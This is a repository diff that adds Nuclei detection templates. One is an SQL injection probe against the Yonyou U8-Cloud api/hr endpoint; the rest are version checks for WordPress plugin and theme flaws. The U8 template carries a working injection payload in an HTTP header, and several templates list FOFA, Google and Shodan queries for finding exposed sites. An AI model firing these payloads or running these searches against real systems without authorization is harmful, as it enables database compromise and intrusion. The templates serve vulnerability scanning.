20240704

date.txt

@@ -1 +1 @@
-20240703
+20240704

poc/api/yonyou-u8-cloud-api-hr-sqli.yaml

@@ -0,0 +1,29 @@
+id: yonyou-u8-cloud-api-hr-sqli
+
+info:
+  name: U8-Cloud API HR SQL Injection
+  author: Co5mos
+  severity: critical
+  description: |
+    用友 U8-cloud `api/hr` 接口存在SQL注入漏洞，攻击者通过漏洞可以获取服务器数据库权限。U8 cloud集中于企业内部管理管控，管理规范，高效，协同，透明。
+  metadata:
+    fofa-query: 'app="用友-U8-Cloud"'
+  tags: sqli, u8cloud, yonyou
+
+variables:
+  str1: "{{randstr}}"
+  str2: "{{randstr}}"
+
+http:
+  - raw:
+    - |
+      GET /u8cloud/api/hr HTTP/1.1
+      Host: {{Hostname}}
+      System: 1' AND 1156 IN (SELECT '{{str1}}' + '1' + '{{str2}}')--
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code==200
+          - contains(body, "{{str1}}1{{str2}}")
+        condition: and

poc/auth/blossom-shop.yaml

@@ -0,0 +1,59 @@
+id: blossom-shop
+
+info:
+  name: >
+    Blossom Shop <= 1.1.7 - Cross-Site Request Forgery to Notice Dismissal
+  author: topscoder
+  severity: medium
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/497960b4-48f3-4a5d-8b69-586da61761f0?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/themes/blossom-shop/"
+    google-query: inurl:"/wp-content/themes/blossom-shop/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-theme,blossom-shop,medium
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/themes/blossom-shop/style.css"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Version: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Version: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "blossom-shop"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.1.7')

poc/cve/CVE-2023-45830-a66867b51a5c6217bf179b499ba90aa6.yaml

@@ -0,0 +1,59 @@
+id: CVE-2023-45830-a66867b51a5c6217bf179b499ba90aa6
+
+info:
+  name: >
+    Accessibility Suite by Online ADA <= 4.12 - Authenticated (Subscriber+) SQL Injection
+  author: topscoder
+  severity: low
+  description: >
+    The Accessibility Suite by Online ADA plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 4.12 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/10590944-e08e-4980-846d-7a88880b2dcd?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-45830
+  metadata:
+    fofa-query: "wp-content/plugins/online-accessibility/"
+    google-query: inurl:"/wp-content/plugins/online-accessibility/"
+    shodan-query: 'vuln:CVE-2023-45830'
+  tags: cve,wordpress,wp-plugin,online-accessibility,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/online-accessibility/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "online-accessibility"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 4.12')

poc/cve/CVE-2023-49188-e3b4b39ef73ed62647b6b2fb16641709.yaml

@@ -0,0 +1,59 @@
+id: CVE-2023-49188-e3b4b39ef73ed62647b6b2fb16641709
+
+info:
+  name: >
+    Track Geolocation Of Users Using Contact Form 7 <= 2.0 - Authenticated (Administrator+) Stored Cross-Site Scripting
+  author: topscoder
+  severity: low
+  description: >
+    The Track Geolocation Of Users Using Contact Form 7 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/724d8f79-f683-4b06-841d-a9104c87f3c6?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 4.4
+    cve-id: CVE-2023-49188
+  metadata:
+    fofa-query: "wp-content/plugins/track-geolocation-of-users-using-contact-form-7/"
+    google-query: inurl:"/wp-content/plugins/track-geolocation-of-users-using-contact-form-7/"
+    shodan-query: 'vuln:CVE-2023-49188'
+  tags: cve,wordpress,wp-plugin,track-geolocation-of-users-using-contact-form-7,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/track-geolocation-of-users-using-contact-form-7/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "track-geolocation-of-users-using-contact-form-7"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 2.0')

poc/cve/CVE-2023-49851-d390050663664f9de834608e3207cc13.yaml

@@ -0,0 +1,59 @@
+id: CVE-2023-49851-d390050663664f9de834608e3207cc13
+
+info:
+  name: >
+    Square Thumbnails <= 1.1.0 - Missing Authorization
+  author: topscoder
+  severity: high
+  description: >
+    The Square Thumbnails plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on an the sqt_settings_save() function in versions up to, and including, 1.1.0. This makes it possible for unauthenticated attackers to update the plugin's settings.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/31cc30c7-262d-4582-8976-fc8095bdca5f?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2023-49851
+  metadata:
+    fofa-query: "wp-content/plugins/square-thumbnails/"
+    google-query: inurl:"/wp-content/plugins/square-thumbnails/"
+    shodan-query: 'vuln:CVE-2023-49851'
+  tags: cve,wordpress,wp-plugin,square-thumbnails,high
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/square-thumbnails/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "square-thumbnails"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.1.0')

poc/cve/CVE-2023-6941-a94abc9759a29fa8abc899afedc379d6.yaml

@@ -0,0 +1,59 @@
+id: CVE-2023-6941-a94abc9759a29fa8abc899afedc379d6
+
+info:
+  name: >
+    Keap Official Opt-in Forms <= 1.0.11 - Authenticated (Admin+) Stored Cross-Site Scripting
+  author: topscoder
+  severity: low
+  description: >
+    The Keap Official Opt-in Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/33210104-68fc-4d88-b681-b30e7abd6e18?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 4.4
+    cve-id: CVE-2023-6941
+  metadata:
+    fofa-query: "wp-content/plugins/infusionsoft-official-opt-in-forms/"
+    google-query: inurl:"/wp-content/plugins/infusionsoft-official-opt-in-forms/"
+    shodan-query: 'vuln:CVE-2023-6941'
+  tags: cve,wordpress,wp-plugin,infusionsoft-official-opt-in-forms,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/infusionsoft-official-opt-in-forms/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "infusionsoft-official-opt-in-forms"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.0.11')

poc/cve/CVE-2024-0892-4b62382a6fe35f459a40dd51e726706c.yaml

@@ -0,0 +1,59 @@
+id: CVE-2024-0892-4b62382a6fe35f459a40dd51e726706c
+
+info:
+  name: >
+    Schema App Structured Data <= 2.2.0 - Cross-Site Request Forgery
+  author: topscoder
+  severity: medium
+  description: >
+    The Schema App Structured Data plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.0. This is due to missing or incorrect nonce validation on the MarkUpdate function. This makes it possible for unauthenticated attackers to update and delete post metadata via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/254291b3-a30d-44ff-9df4-6ba700a9efc9?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+    cvss-score: 4.3
+    cve-id: CVE-2024-0892
+  metadata:
+    fofa-query: "wp-content/plugins/schema-app-structured-data-for-schemaorg/"
+    google-query: inurl:"/wp-content/plugins/schema-app-structured-data-for-schemaorg/"
+    shodan-query: 'vuln:CVE-2024-0892'
+  tags: cve,wordpress,wp-plugin,schema-app-structured-data-for-schemaorg,medium
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/schema-app-structured-data-for-schemaorg/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "schema-app-structured-data-for-schemaorg"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 2.2.0')